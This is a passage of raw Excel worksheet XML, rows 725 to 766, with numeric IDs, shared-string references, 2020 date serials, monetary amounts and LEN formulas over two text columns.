        <v>430</v>
      </c>
      <c r="D725" t="s">
        <v>10190</v>
      </c>
      <c r="E725">
        <v>2</v>
      </c>
      <c r="F725" t="s">
        <v>1746</v>
      </c>
      <c r="G725" s="1">
        <v>43944</v>
      </c>
      <c r="H725">
        <v>120000</v>
      </c>
      <c r="J725" t="s">
        <v>10191</v>
      </c>
      <c r="K725">
        <f>LEN(I725)</f>
        <v>0</v>
      </c>
      <c r="L725">
        <f>LEN(J725)</f>
        <v>20</v>
      </c>
    </row>
    <row r="726" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A726">
        <v>19710</v>
      </c>
      <c r="B726">
        <v>760</v>
      </c>
      <c r="C726" t="s">
        <v>430</v>
      </c>
      <c r="D726" t="s">
        <v>10190</v>
      </c>
      <c r="E726">
        <v>2</v>
      </c>
      <c r="F726" t="s">
        <v>1030</v>
      </c>
      <c r="G726" s="1">
        <v>43944</v>
      </c>
      <c r="H726">
        <v>240000</v>
      </c>
      <c r="J726" t="s">
        <v>10191</v>
      </c>
      <c r="K726">
        <f>LEN(I726)</f>
        <v>0</v>
      </c>
      <c r="L726">
        <f>LEN(J726)</f>
        <v>20</v>
      </c>
    </row>
    <row r="727" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A727">
        <v>19851</v>
      </c>
      <c r="B727">
        <v>373</v>
      </c>
      <c r="C727" t="s">
        <v>535</v>
      </c>
      <c r="D727" t="s">
        <v>10281</v>
      </c>
      <c r="E727">
        <v>16</v>
      </c>
      <c r="F727" t="s">
        <v>10007</v>
      </c>
      <c r="G727" s="1">
        <v>43935</v>
      </c>
      <c r="H727">
        <v>180000</v>
      </c>
      <c r="J727" t="s">
        <v>9679</v>
      </c>
      <c r="K727">
        <f>LEN(I727)</f>
        <v>0</v>
      </c>
      <c r="L727">
        <f>LEN(J727)</f>
        <v>20</v>
      </c>
    </row>
    <row r="728" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A728">
        <v>20049</v>
      </c>
      <c r="B728">
        <v>2669</v>
      </c>
      <c r="C728" t="s">
        <v>5588</v>
      </c>
      <c r="D728" t="s">
        <v>10434</v>
      </c>
      <c r="E728">
        <v>12</v>
      </c>
      <c r="F728" t="s">
        <v>4686</v>
      </c>
      <c r="G728" s="1">
        <v>43928</v>
      </c>
      <c r="H728">
        <v>17800</v>
      </c>
      <c r="J728" t="s">
        <v>10437</v>
      </c>
      <c r="K728">
        <f>LEN(I728)</f>
        <v>0</v>
      </c>
      <c r="L728">
        <f>LEN(J728)</f>
        <v>20</v>
      </c>
    </row>
    <row r="729" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A729">
        <v>20051</v>
      </c>
      <c r="B729">
        <v>2669</v>
      </c>
      <c r="C729" t="s">
        <v>5588</v>
      </c>
      <c r="D729" t="s">
        <v>10434</v>
      </c>
      <c r="E729">
        <v>12</v>
      </c>
      <c r="F729" t="s">
        <v>10440</v>
      </c>
      <c r="G729" s="1">
        <v>43928</v>
      </c>
      <c r="H729">
        <v>121</v>
      </c>
      <c r="J729" t="s">
        <v>10437</v>
      </c>
      <c r="K729">
        <f>LEN(I729)</f>
        <v>0</v>
      </c>
      <c r="L729">
        <f>LEN(J729)</f>
        <v>20</v>
      </c>
    </row>
    <row r="730" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A730">
        <v>20053</v>
      </c>
      <c r="B730">
        <v>2669</v>
      </c>
      <c r="C730" t="s">
        <v>5588</v>
      </c>
      <c r="D730" t="s">
        <v>10434</v>
      </c>
      <c r="E730">
        <v>12</v>
      </c>
      <c r="F730" t="s">
        <v>10444</v>
      </c>
      <c r="G730" s="1">
        <v>43928</v>
      </c>
      <c r="H730">
        <v>201</v>
      </c>
      <c r="J730" t="s">
        <v>10437</v>
      </c>
      <c r="K730">
        <f>LEN(I730)</f>
        <v>0</v>
      </c>
      <c r="L730">
        <f>LEN(J730)</f>
        <v>20</v>
      </c>
    </row>
    <row r="731" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A731">
        <v>20055</v>
      </c>
      <c r="B731">
        <v>2669</v>
      </c>
      <c r="C731" t="s">
        <v>5588</v>
      </c>
      <c r="D731" t="s">
        <v>10434</v>
      </c>
      <c r="E731">
        <v>12</v>
      </c>
      <c r="F731" t="s">
        <v>9527</v>
      </c>
      <c r="G731" s="1">
        <v>43928</v>
      </c>
      <c r="H731">
        <v>1820</v>
      </c>
      <c r="J731" t="s">
        <v>10437</v>
      </c>
      <c r="K731">
        <f>LEN(I731)</f>
        <v>0</v>
      </c>
      <c r="L731">
        <f>LEN(J731)</f>
        <v>20</v>
      </c>
    </row>
    <row r="732" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A732">
        <v>20056</v>
      </c>
      <c r="B732">
        <v>2669</v>
      </c>
      <c r="C732" t="s">
        <v>5588</v>
      </c>
      <c r="D732" t="s">
        <v>10434</v>
      </c>
      <c r="E732">
        <v>12</v>
      </c>
      <c r="F732" t="s">
        <v>9681</v>
      </c>
      <c r="G732" s="1">
        <v>43928</v>
      </c>
      <c r="H732">
        <v>230</v>
      </c>
      <c r="J732" t="s">
        <v>10437</v>
      </c>
      <c r="K732">
        <f>LEN(I732)</f>
        <v>0</v>
      </c>
      <c r="L732">
        <f>LEN(J732)</f>
        <v>20</v>
      </c>
    </row>
    <row r="733" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A733">
        <v>20173</v>
      </c>
      <c r="B733">
        <v>533</v>
      </c>
      <c r="C733" t="s">
        <v>762</v>
      </c>
      <c r="D733" t="s">
        <v>10523</v>
      </c>
      <c r="E733">
        <v>12</v>
      </c>
      <c r="F733" t="s">
        <v>764</v>
      </c>
      <c r="G733" s="1">
        <v>43955</v>
      </c>
      <c r="H733">
        <v>200000</v>
      </c>
      <c r="J733" t="s">
        <v>10524</v>
      </c>
      <c r="K733">
        <f>LEN(I733)</f>
        <v>0</v>
      </c>
      <c r="L733">
        <f>LEN(J733)</f>
        <v>20</v>
      </c>
    </row>
    <row r="734" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A734">
        <v>20187</v>
      </c>
      <c r="B734">
        <v>709</v>
      </c>
      <c r="C734" t="s">
        <v>781</v>
      </c>
      <c r="D734" t="s">
        <v>10531</v>
      </c>
      <c r="E734">
        <v>31</v>
      </c>
      <c r="F734" t="s">
        <v>10532</v>
      </c>
      <c r="G734" s="1">
        <v>43943</v>
      </c>
      <c r="H734">
        <v>350000</v>
      </c>
      <c r="J734" t="s">
        <v>9679</v>
      </c>
      <c r="K734">
        <f>LEN(I734)</f>
        <v>0</v>
      </c>
      <c r="L734">
        <f>LEN(J734)</f>
        <v>20</v>
      </c>
    </row>
    <row r="735" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A735">
        <v>20336</v>
      </c>
      <c r="B735">
        <v>235</v>
      </c>
      <c r="C735" t="s">
        <v>486</v>
      </c>
      <c r="D735" t="s">
        <v>10198</v>
      </c>
      <c r="E735">
        <v>16</v>
      </c>
      <c r="F735" t="s">
        <v>10638</v>
      </c>
      <c r="G735" s="1">
        <v>43937</v>
      </c>
      <c r="H735">
        <v>1331000</v>
      </c>
      <c r="J735" t="s">
        <v>9679</v>
      </c>
      <c r="K735">
        <f>LEN(I735)</f>
        <v>0</v>
      </c>
      <c r="L735">
        <f>LEN(J735)</f>
        <v>20</v>
      </c>
    </row>
    <row r="736" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A736">
        <v>20351</v>
      </c>
      <c r="B736">
        <v>899</v>
      </c>
      <c r="C736" t="s">
        <v>2943</v>
      </c>
      <c r="D736" t="s">
        <v>10644</v>
      </c>
      <c r="E736">
        <v>26</v>
      </c>
      <c r="F736" t="s">
        <v>9533</v>
      </c>
      <c r="G736" s="1">
        <v>44088</v>
      </c>
      <c r="H736">
        <v>0</v>
      </c>
      <c r="J736" t="s">
        <v>10404</v>
      </c>
      <c r="K736">
        <f>LEN(I736)</f>
        <v>0</v>
      </c>
      <c r="L736">
        <f>LEN(J736)</f>
        <v>20</v>
      </c>
    </row>
    <row r="737" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A737">
        <v>20390</v>
      </c>
      <c r="B737">
        <v>532</v>
      </c>
      <c r="C737" t="s">
        <v>982</v>
      </c>
      <c r="D737" t="s">
        <v>10675</v>
      </c>
      <c r="E737">
        <v>12</v>
      </c>
      <c r="F737" t="s">
        <v>9459</v>
      </c>
      <c r="G737" s="1">
        <v>43949</v>
      </c>
      <c r="H737">
        <v>120000</v>
      </c>
      <c r="J737" t="s">
        <v>10685</v>
      </c>
      <c r="K737">
        <f>LEN(I737)</f>
        <v>0</v>
      </c>
      <c r="L737">
        <f>LEN(J737)</f>
        <v>20</v>
      </c>
    </row>
    <row r="738" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A738">
        <v>20635</v>
      </c>
      <c r="B738">
        <v>768</v>
      </c>
      <c r="C738" t="s">
        <v>16319</v>
      </c>
      <c r="D738" t="s">
        <v>16320</v>
      </c>
      <c r="E738">
        <v>16</v>
      </c>
      <c r="F738" t="s">
        <v>9681</v>
      </c>
      <c r="G738" s="1">
        <v>44032</v>
      </c>
      <c r="H738" s="4">
        <v>30000</v>
      </c>
      <c r="J738" t="s">
        <v>10738</v>
      </c>
      <c r="K738">
        <f>LEN(I738)</f>
        <v>0</v>
      </c>
      <c r="L738">
        <f>LEN(J738)</f>
        <v>20</v>
      </c>
    </row>
    <row r="739" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A739">
        <v>20736</v>
      </c>
      <c r="B739">
        <v>862</v>
      </c>
      <c r="C739" t="s">
        <v>3051</v>
      </c>
      <c r="D739" t="s">
        <v>10942</v>
      </c>
      <c r="E739">
        <v>2</v>
      </c>
      <c r="F739" t="s">
        <v>10945</v>
      </c>
      <c r="G739" s="1">
        <v>43990</v>
      </c>
      <c r="H739">
        <v>2000000</v>
      </c>
      <c r="J739" t="s">
        <v>10946</v>
      </c>
      <c r="K739">
        <f>LEN(I739)</f>
        <v>0</v>
      </c>
      <c r="L739">
        <f>LEN(J739)</f>
        <v>20</v>
      </c>
    </row>
    <row r="740" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A740">
        <v>20916</v>
      </c>
      <c r="B740">
        <v>507</v>
      </c>
      <c r="C740" t="s">
        <v>1335</v>
      </c>
      <c r="D740" t="s">
        <v>11058</v>
      </c>
      <c r="E740">
        <v>29</v>
      </c>
      <c r="F740" t="s">
        <v>2236</v>
      </c>
      <c r="G740" s="1">
        <v>43977</v>
      </c>
      <c r="H740">
        <v>698000</v>
      </c>
      <c r="J740" t="s">
        <v>9679</v>
      </c>
      <c r="K740">
        <f>LEN(I740)</f>
        <v>0</v>
      </c>
      <c r="L740">
        <f>LEN(J740)</f>
        <v>20</v>
      </c>
    </row>
    <row r="741" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A741">
        <v>20952</v>
      </c>
      <c r="B741">
        <v>532</v>
      </c>
      <c r="C741" t="s">
        <v>982</v>
      </c>
      <c r="D741" t="s">
        <v>10675</v>
      </c>
      <c r="E741">
        <v>12</v>
      </c>
      <c r="F741" t="s">
        <v>9595</v>
      </c>
      <c r="G741" s="1">
        <v>43966</v>
      </c>
      <c r="H741">
        <v>1000</v>
      </c>
      <c r="J741" t="s">
        <v>10437</v>
      </c>
      <c r="K741">
        <f>LEN(I741)</f>
        <v>0</v>
      </c>
      <c r="L741">
        <f>LEN(J741)</f>
        <v>20</v>
      </c>
    </row>
    <row r="742" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A742">
        <v>21058</v>
      </c>
      <c r="B742">
        <v>2755</v>
      </c>
      <c r="C742" t="s">
        <v>1838</v>
      </c>
      <c r="D742" t="s">
        <v>11118</v>
      </c>
      <c r="E742">
        <v>12</v>
      </c>
      <c r="F742" t="s">
        <v>9441</v>
      </c>
      <c r="G742" s="1">
        <v>44081</v>
      </c>
      <c r="H742">
        <v>310000</v>
      </c>
      <c r="J742" t="s">
        <v>9679</v>
      </c>
      <c r="K742">
        <f>LEN(I742)</f>
        <v>0</v>
      </c>
      <c r="L742">
        <f>LEN(J742)</f>
        <v>20</v>
      </c>
    </row>
    <row r="743" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A743">
        <v>21059</v>
      </c>
      <c r="B743">
        <v>2755</v>
      </c>
      <c r="C743" t="s">
        <v>1838</v>
      </c>
      <c r="D743" t="s">
        <v>11118</v>
      </c>
      <c r="E743">
        <v>12</v>
      </c>
      <c r="F743" t="s">
        <v>10007</v>
      </c>
      <c r="G743" s="1">
        <v>44081</v>
      </c>
      <c r="H743">
        <v>75000</v>
      </c>
      <c r="J743" t="s">
        <v>9679</v>
      </c>
      <c r="K743">
        <f>LEN(I743)</f>
        <v>0</v>
      </c>
      <c r="L743">
        <f>LEN(J743)</f>
        <v>20</v>
      </c>
    </row>
    <row r="744" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A744">
        <v>21372</v>
      </c>
      <c r="B744">
        <v>469</v>
      </c>
      <c r="C744" t="s">
        <v>1626</v>
      </c>
      <c r="D744" t="s">
        <v>11336</v>
      </c>
      <c r="E744">
        <v>12</v>
      </c>
      <c r="F744" t="s">
        <v>11342</v>
      </c>
      <c r="G744" s="1">
        <v>44075</v>
      </c>
      <c r="H744">
        <v>500000</v>
      </c>
      <c r="J744" t="s">
        <v>10738</v>
      </c>
      <c r="K744">
        <f>LEN(I744)</f>
        <v>0</v>
      </c>
      <c r="L744">
        <f>LEN(J744)</f>
        <v>20</v>
      </c>
    </row>
    <row r="745" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A745">
        <v>21095</v>
      </c>
      <c r="B745">
        <v>2075</v>
      </c>
      <c r="C745" t="s">
        <v>6105</v>
      </c>
      <c r="D745" t="s">
        <v>11134</v>
      </c>
      <c r="E745">
        <v>2</v>
      </c>
      <c r="F745" t="s">
        <v>11135</v>
      </c>
      <c r="G745" s="1">
        <v>44001</v>
      </c>
      <c r="H745">
        <v>200000</v>
      </c>
      <c r="I745" t="s">
        <v>11136</v>
      </c>
      <c r="J745" t="s">
        <v>9639</v>
      </c>
      <c r="K745">
        <f>LEN(I745)</f>
        <v>152</v>
      </c>
      <c r="L745">
        <f>LEN(J745)</f>
        <v>19</v>
      </c>
    </row>
    <row r="746" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A746">
        <v>20904</v>
      </c>
      <c r="B746">
        <v>684</v>
      </c>
      <c r="C746" t="s">
        <v>1352</v>
      </c>
      <c r="D746" t="s">
        <v>11052</v>
      </c>
      <c r="E746">
        <v>5</v>
      </c>
      <c r="F746" t="s">
        <v>11053</v>
      </c>
      <c r="G746" s="1">
        <v>44006</v>
      </c>
      <c r="H746">
        <v>3000</v>
      </c>
      <c r="I746" t="s">
        <v>10222</v>
      </c>
      <c r="J746" t="s">
        <v>9639</v>
      </c>
      <c r="K746">
        <f>LEN(I746)</f>
        <v>49</v>
      </c>
      <c r="L746">
        <f>LEN(J746)</f>
        <v>19</v>
      </c>
    </row>
    <row r="747" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A747">
        <v>20905</v>
      </c>
      <c r="B747">
        <v>684</v>
      </c>
      <c r="C747" t="s">
        <v>1352</v>
      </c>
      <c r="D747" t="s">
        <v>11052</v>
      </c>
      <c r="E747">
        <v>5</v>
      </c>
      <c r="F747" t="s">
        <v>11023</v>
      </c>
      <c r="G747" s="1">
        <v>44006</v>
      </c>
      <c r="H747">
        <v>5000</v>
      </c>
      <c r="I747" t="s">
        <v>10222</v>
      </c>
      <c r="J747" t="s">
        <v>9639</v>
      </c>
      <c r="K747">
        <f>LEN(I747)</f>
        <v>49</v>
      </c>
      <c r="L747">
        <f>LEN(J747)</f>
        <v>19</v>
      </c>
    </row>
    <row r="748" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A748">
        <v>20917</v>
      </c>
      <c r="B748">
        <v>662</v>
      </c>
      <c r="C748" t="s">
        <v>1366</v>
      </c>
      <c r="D748" t="s">
        <v>11060</v>
      </c>
      <c r="E748">
        <v>5</v>
      </c>
      <c r="F748" t="s">
        <v>11061</v>
      </c>
      <c r="G748" s="1">
        <v>44006</v>
      </c>
      <c r="H748">
        <v>10000</v>
      </c>
      <c r="I748" t="s">
        <v>10222</v>
      </c>
      <c r="J748" t="s">
        <v>9639</v>
      </c>
      <c r="K748">
        <f>LEN(I748)</f>
        <v>49</v>
      </c>
      <c r="L748">
        <f>LEN(J748)</f>
        <v>19</v>
      </c>
    </row>
    <row r="749" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A749">
        <v>20918</v>
      </c>
      <c r="B749">
        <v>662</v>
      </c>
      <c r="C749" t="s">
        <v>1366</v>
      </c>
      <c r="D749" t="s">
        <v>11060</v>
      </c>
      <c r="E749">
        <v>5</v>
      </c>
      <c r="F749" t="s">
        <v>11062</v>
      </c>
      <c r="G749" s="1">
        <v>44006</v>
      </c>
      <c r="H749">
        <v>5000</v>
      </c>
      <c r="I749" t="s">
        <v>10222</v>
      </c>
      <c r="J749" t="s">
        <v>9639</v>
      </c>
      <c r="K749">
        <f>LEN(I749)</f>
        <v>49</v>
      </c>
      <c r="L749">
        <f>LEN(J749)</f>
        <v>19</v>
      </c>
    </row>
    <row r="750" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A750">
        <v>20316</v>
      </c>
      <c r="B750">
        <v>482</v>
      </c>
      <c r="C750" t="s">
        <v>863</v>
      </c>
      <c r="D750" t="s">
        <v>10620</v>
      </c>
      <c r="E750">
        <v>6</v>
      </c>
      <c r="F750" t="s">
        <v>10622</v>
      </c>
      <c r="G750" s="1">
        <v>43927</v>
      </c>
      <c r="H750">
        <v>123000</v>
      </c>
      <c r="I750" t="s">
        <v>10621</v>
      </c>
      <c r="J750" t="s">
        <v>9639</v>
      </c>
      <c r="K750">
        <f>LEN(I750)</f>
        <v>39</v>
      </c>
      <c r="L750">
        <f>LEN(J750)</f>
        <v>19</v>
      </c>
    </row>
    <row r="751" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A751">
        <v>19981</v>
      </c>
      <c r="B751">
        <v>2284</v>
      </c>
      <c r="C751" t="s">
        <v>5536</v>
      </c>
      <c r="D751" t="s">
        <v>10370</v>
      </c>
      <c r="E751">
        <v>26</v>
      </c>
      <c r="F751" t="s">
        <v>5434</v>
      </c>
      <c r="G751" s="1">
        <v>43885</v>
      </c>
      <c r="H751">
        <v>41760000</v>
      </c>
      <c r="I751" t="s">
        <v>10323</v>
      </c>
      <c r="J751" t="s">
        <v>9639</v>
      </c>
      <c r="K751">
        <f>LEN(I751)</f>
        <v>33</v>
      </c>
      <c r="L751">
        <f>LEN(J751)</f>
        <v>19</v>
      </c>
    </row>
    <row r="752" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A752">
        <v>20984</v>
      </c>
      <c r="B752">
        <v>803</v>
      </c>
      <c r="C752" t="s">
        <v>1359</v>
      </c>
      <c r="D752" t="s">
        <v>16327</v>
      </c>
      <c r="E752">
        <v>5</v>
      </c>
      <c r="F752" t="s">
        <v>11089</v>
      </c>
      <c r="G752" s="1">
        <v>44089</v>
      </c>
      <c r="H752" s="4">
        <v>65000</v>
      </c>
      <c r="I752" t="s">
        <v>10518</v>
      </c>
      <c r="J752" t="s">
        <v>9639</v>
      </c>
      <c r="K752">
        <f>LEN(I752)</f>
        <v>31</v>
      </c>
      <c r="L752">
        <f>LEN(J752)</f>
        <v>19</v>
      </c>
    </row>
    <row r="753" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A753">
        <v>20985</v>
      </c>
      <c r="B753">
        <v>803</v>
      </c>
      <c r="C753" t="s">
        <v>1359</v>
      </c>
      <c r="D753" t="s">
        <v>16327</v>
      </c>
      <c r="E753">
        <v>5</v>
      </c>
      <c r="F753" t="s">
        <v>11090</v>
      </c>
      <c r="G753" s="1">
        <v>44089</v>
      </c>
      <c r="H753" s="4">
        <v>10000</v>
      </c>
      <c r="I753" t="s">
        <v>10518</v>
      </c>
      <c r="J753" t="s">
        <v>9639</v>
      </c>
      <c r="K753">
        <f>LEN(I753)</f>
        <v>31</v>
      </c>
      <c r="L753">
        <f>LEN(J753)</f>
        <v>19</v>
      </c>
    </row>
    <row r="754" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A754">
        <v>20986</v>
      </c>
      <c r="B754">
        <v>803</v>
      </c>
      <c r="C754" t="s">
        <v>1359</v>
      </c>
      <c r="D754" t="s">
        <v>11088</v>
      </c>
      <c r="E754">
        <v>5</v>
      </c>
      <c r="F754" t="s">
        <v>9676</v>
      </c>
      <c r="G754" s="1">
        <v>44089</v>
      </c>
      <c r="H754">
        <v>3000</v>
      </c>
      <c r="I754" t="s">
        <v>10518</v>
      </c>
      <c r="J754" t="s">
        <v>9639</v>
      </c>
      <c r="K754">
        <f>LEN(I754)</f>
        <v>31</v>
      </c>
      <c r="L754">
        <f>LEN(J754)</f>
        <v>19</v>
      </c>
    </row>
    <row r="755" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A755">
        <v>17970</v>
      </c>
      <c r="B755">
        <v>1149</v>
      </c>
      <c r="C755" t="s">
        <v>2525</v>
      </c>
      <c r="D755" t="s">
        <v>9828</v>
      </c>
      <c r="E755">
        <v>6</v>
      </c>
      <c r="F755" t="s">
        <v>9722</v>
      </c>
      <c r="G755" s="1">
        <v>43845</v>
      </c>
      <c r="H755">
        <v>2000</v>
      </c>
      <c r="I755" t="s">
        <v>9550</v>
      </c>
      <c r="J755" t="s">
        <v>9639</v>
      </c>
      <c r="K755">
        <f>LEN(I755)</f>
        <v>18</v>
      </c>
      <c r="L755">
        <f>LEN(J755)</f>
        <v>19</v>
      </c>
    </row>
    <row r="756" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A756">
        <v>17971</v>
      </c>
      <c r="B756">
        <v>1149</v>
      </c>
      <c r="C756" t="s">
        <v>2525</v>
      </c>
      <c r="D756" t="s">
        <v>9828</v>
      </c>
      <c r="E756">
        <v>6</v>
      </c>
      <c r="F756" t="s">
        <v>9640</v>
      </c>
      <c r="G756" s="1">
        <v>43845</v>
      </c>
      <c r="H756">
        <v>3500</v>
      </c>
      <c r="I756" t="s">
        <v>9550</v>
      </c>
      <c r="J756" t="s">
        <v>9639</v>
      </c>
      <c r="K756">
        <f>LEN(I756)</f>
        <v>18</v>
      </c>
      <c r="L756">
        <f>LEN(J756)</f>
        <v>19</v>
      </c>
    </row>
    <row r="757" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A757">
        <v>19267</v>
      </c>
      <c r="B757">
        <v>775</v>
      </c>
      <c r="C757" t="s">
        <v>214</v>
      </c>
      <c r="D757" t="s">
        <v>9890</v>
      </c>
      <c r="E757">
        <v>6</v>
      </c>
      <c r="F757" t="s">
        <v>9891</v>
      </c>
      <c r="G757" s="1">
        <v>43900</v>
      </c>
      <c r="H757">
        <v>40000</v>
      </c>
      <c r="I757" t="s">
        <v>9550</v>
      </c>
      <c r="J757" t="s">
        <v>9639</v>
      </c>
      <c r="K757">
        <f>LEN(I757)</f>
        <v>18</v>
      </c>
      <c r="L757">
        <f>LEN(J757)</f>
        <v>19</v>
      </c>
    </row>
    <row r="758" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A758">
        <v>19268</v>
      </c>
      <c r="B758">
        <v>775</v>
      </c>
      <c r="C758" t="s">
        <v>214</v>
      </c>
      <c r="D758" t="s">
        <v>9890</v>
      </c>
      <c r="E758">
        <v>6</v>
      </c>
      <c r="F758" t="s">
        <v>9561</v>
      </c>
      <c r="G758" s="1">
        <v>43900</v>
      </c>
      <c r="H758">
        <v>180000</v>
      </c>
      <c r="I758" t="s">
        <v>9550</v>
      </c>
      <c r="J758" t="s">
        <v>9639</v>
      </c>
      <c r="K758">
        <f>LEN(I758)</f>
        <v>18</v>
      </c>
      <c r="L758">
        <f>LEN(J758)</f>
        <v>19</v>
      </c>
    </row>
    <row r="759" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A759">
        <v>19269</v>
      </c>
      <c r="B759">
        <v>775</v>
      </c>
      <c r="C759" t="s">
        <v>214</v>
      </c>
      <c r="D759" t="s">
        <v>9890</v>
      </c>
      <c r="E759">
        <v>6</v>
      </c>
      <c r="F759" t="s">
        <v>9470</v>
      </c>
      <c r="G759" s="1">
        <v>43900</v>
      </c>
      <c r="H759">
        <v>100000</v>
      </c>
      <c r="I759" t="s">
        <v>9550</v>
      </c>
      <c r="J759" t="s">
        <v>9639</v>
      </c>
      <c r="K759">
        <f>LEN(I759)</f>
        <v>18</v>
      </c>
      <c r="L759">
        <f>LEN(J759)</f>
        <v>19</v>
      </c>
    </row>
    <row r="760" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A760">
        <v>19270</v>
      </c>
      <c r="B760">
        <v>775</v>
      </c>
      <c r="C760" t="s">
        <v>214</v>
      </c>
      <c r="D760" t="s">
        <v>9890</v>
      </c>
      <c r="E760">
        <v>6</v>
      </c>
      <c r="F760" t="s">
        <v>9681</v>
      </c>
      <c r="G760" s="1">
        <v>43900</v>
      </c>
      <c r="H760">
        <v>10000</v>
      </c>
      <c r="I760" t="s">
        <v>9550</v>
      </c>
      <c r="J760" t="s">
        <v>9639</v>
      </c>
      <c r="K760">
        <f>LEN(I760)</f>
        <v>18</v>
      </c>
      <c r="L760">
        <f>LEN(J760)</f>
        <v>19</v>
      </c>
    </row>
    <row r="761" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A761">
        <v>19271</v>
      </c>
      <c r="B761">
        <v>775</v>
      </c>
      <c r="C761" t="s">
        <v>214</v>
      </c>
      <c r="D761" t="s">
        <v>9890</v>
      </c>
      <c r="E761">
        <v>6</v>
      </c>
      <c r="F761" t="s">
        <v>9722</v>
      </c>
      <c r="G761" s="1">
        <v>43900</v>
      </c>
      <c r="H761">
        <v>50</v>
      </c>
      <c r="I761" t="s">
        <v>9550</v>
      </c>
      <c r="J761" t="s">
        <v>9639</v>
      </c>
      <c r="K761">
        <f>LEN(I761)</f>
        <v>18</v>
      </c>
      <c r="L761">
        <f>LEN(J761)</f>
        <v>19</v>
      </c>
    </row>
    <row r="762" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A762">
        <v>19272</v>
      </c>
      <c r="B762">
        <v>775</v>
      </c>
      <c r="C762" t="s">
        <v>214</v>
      </c>
      <c r="D762" t="s">
        <v>9890</v>
      </c>
      <c r="E762">
        <v>6</v>
      </c>
      <c r="F762" t="s">
        <v>9892</v>
      </c>
      <c r="G762" s="1">
        <v>43900</v>
      </c>
      <c r="H762">
        <v>50</v>
      </c>
      <c r="I762" t="s">
        <v>9550</v>
      </c>
      <c r="J762" t="s">
        <v>9639</v>
      </c>
      <c r="K762">
        <f>LEN(I762)</f>
        <v>18</v>
      </c>
      <c r="L762">
        <f>LEN(J762)</f>
        <v>19</v>
      </c>
    </row>
    <row r="763" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A763">
        <v>20084</v>
      </c>
      <c r="B763">
        <v>170</v>
      </c>
      <c r="C763" t="s">
        <v>697</v>
      </c>
      <c r="D763" t="s">
        <v>10462</v>
      </c>
      <c r="E763">
        <v>6</v>
      </c>
      <c r="F763" t="s">
        <v>7241</v>
      </c>
      <c r="G763" s="1">
        <v>43910</v>
      </c>
      <c r="H763">
        <v>450000</v>
      </c>
      <c r="I763" t="s">
        <v>9550</v>
      </c>
      <c r="J763" t="s">
        <v>9639</v>
      </c>
      <c r="K763">
        <f>LEN(I763)</f>
        <v>18</v>
      </c>
      <c r="L763">
        <f>LEN(J763)</f>
        <v>19</v>
      </c>
    </row>
    <row r="764" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A764">
        <v>20085</v>
      </c>
      <c r="B764">
        <v>170</v>
      </c>
      <c r="C764" t="s">
        <v>697</v>
      </c>
      <c r="D764" t="s">
        <v>10462</v>
      </c>
      <c r="E764">
        <v>6</v>
      </c>
      <c r="F764" t="s">
        <v>10463</v>
      </c>
      <c r="G764" s="1">
        <v>43910</v>
      </c>
      <c r="H764">
        <v>300000</v>
      </c>
      <c r="I764" t="s">
        <v>9550</v>
      </c>
      <c r="J764" t="s">
        <v>9639</v>
      </c>
      <c r="K764">
        <f>LEN(I764)</f>
        <v>18</v>
      </c>
      <c r="L764">
        <f>LEN(J764)</f>
        <v>19</v>
      </c>
    </row>
    <row r="765" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A765">
        <v>20502</v>
      </c>
      <c r="B765">
        <v>512</v>
      </c>
      <c r="C765" t="s">
        <v>16307</v>
      </c>
      <c r="D765" t="s">
        <v>16308</v>
      </c>
      <c r="E765">
        <v>6</v>
      </c>
      <c r="F765" t="s">
        <v>10463</v>
      </c>
      <c r="G765" s="1">
        <v>43927</v>
      </c>
      <c r="H765">
        <v>629284.30000000005</v>
      </c>
      <c r="I765" t="s">
        <v>9550</v>
      </c>
      <c r="J765" t="s">
        <v>9639</v>
      </c>
      <c r="K765">
        <f>LEN(I765)</f>
        <v>18</v>
      </c>
      <c r="L765">
        <f>LEN(J765)</f>
        <v>19</v>
      </c>
    </row>
    <row r="766" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A766">
        <v>20642</v>
      </c>
      <c r="B766">
        <v>520</v>
      </c>
      <c r="C766" t="s">
        <v>1123</v>
      </c>
      <c r="D766" t="s">
        <v>10863</v>
      </c>
      <c r="E766">
        <v>16</v>
      </c>
      <c r="F766" t="s">
        <v>9435</v>
      </c>
      <c r="G766" s="1">
        <v>43980</v>
      </c>
      <c r="H766">
        <v>50000</v>
      </c>
      <c r="I766" t="s">
        <v>10409</v>
      </c>
      <c r="J766" t="s">
        <v>9639</v>
      </c>
      <c r="K766">
        <f>LEN(I766)</f>
        <v>16</v>
      </c>
      <c r="L766">
